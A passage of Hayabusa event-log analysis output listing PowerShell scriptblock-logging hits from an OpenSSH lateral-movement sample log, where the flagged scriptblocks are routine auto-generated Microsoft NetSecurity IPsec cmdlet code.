($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and 